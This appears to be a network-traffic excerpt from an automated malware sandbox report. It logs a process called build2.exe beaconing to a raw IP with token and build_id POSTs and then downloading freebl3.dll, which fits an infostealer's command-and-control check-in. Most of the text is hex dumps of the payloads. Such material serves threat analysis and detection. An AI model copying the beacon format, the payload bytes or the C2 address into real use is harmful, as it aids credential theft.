2024-05-25 19:30:02 UTC	16384	IN	Data Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff Data Ascii: $;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|D$9D$8vQ
2024-05-25 19:30:02 UTC	16384	IN	Data Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: 3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-05-25 19:30:02 UTC	16384	IN	Data Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
2024-05-25 19:30:02 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 Data Ascii: Vt$W\|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
2024-05-25 19:30:02 UTC	16384	IN	Data Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$L$J_
2024-05-25 19:30:02 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49790	65.109.242.59	443	5316	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:30:05 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHIJDHIDBGHJKECBFIID User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 4677 Connection: Keep-Alive Cache-Control: no-cache
2024-05-25 19:30:05 UTC	4677	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 4a 44 48 49 44 42 47 48 4a 4b 45 43 42 46 49 49 44 0d 0a 43 6f 6e 74 Data Ascii: ------DHIJDHIDBGHJKECBFIIDContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------DHIJDHIDBGHJKECBFIIDContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------DHIJDHIDBGHJKECBFIIDCont
2024-05-25 19:30:06 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 19:30:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-25 19:30:06 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49791	65.109.242.59	443	5316	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:30:06 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHD User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 1529 Connection: Keep-Alive Cache-Control: no-cache
2024-05-25 19:30:06 UTC	1529	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 44 0d 0a 43 6f 6e 74 Data Ascii: ------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------FCBFBGDBKJKECAAKKFHDContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------FCBFBGDBKJKECAAKKFHDCont
2024-05-25 19:30:07 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 19:30:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-25 19:30:07 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49792	65.109.242.59	443	5316	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:30:07 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFBKKFBAEGDHJJJJKFBK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-05-25 19:30:07 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 41 46 42 4b 4b 46 42 41 45 47 44 48 4a 4a 4a 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 Data Ascii: ------AFBKKFBAEGDHJJJJKFBKContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------AFBKKFBAEGDHJJJJKFBKContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------AFBKKFBAEGDHJJJJKFBKCont
2024-05-25 19:30:08 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 19:30:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-25 19:30:08 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49793	65.109.242.59	443	5316	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:30:09 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJJJKEHCAKFBFHJKEHCF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-05-25 19:30:09 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 4b 45 48 43 41 4b 46 42 46 48 4a 4b 45 48 43 46 0d 0a 43 6f 6e 74 Data Ascii: ------JJJJKEHCAKFBFHJKEHCFContent-Disposition: form-data; name="token"23b9757c51a5710499a79eeb8b1a014e------JJJJKEHCAKFBFHJKEHCFContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------JJJJKEHCAKFBFHJKEHCFCont
2024-05-25 19:30:10 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 19:30:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-25 19:30:10 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49794	65.109.242.59	443	5316	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:30:10 UTC	173	OUT	GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Cache-Control: no-cache
2024-05-25 19:30:10 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 19:30:10 GMT Content-Type: application/octet-stream Content-Length: 685392 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-a7550" Accept-Ranges: bytes
2024-05-25 19:30:10 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-05-25 19:30:10 UTC	16384	IN	Data Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b Data Ascii: }1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuMM1]1x]E0
2024-05-25 19:30:10 UTC	16384	IN	Data Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90 Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
2024-05-25 19:30:11 UTC	16384	IN	Data Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
2024-05-25 19:30:11 UTC	16384	IN	Data Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
2024-05-25 19:30:11 UTC	16384	IN	Data Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0 Data Ascii: }EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@w,0w w1
2024-05-25 19:30:11 UTC	16384	IN	Data Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE\|l
2024-05-25 19:30:11 UTC	16384	IN	Data Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
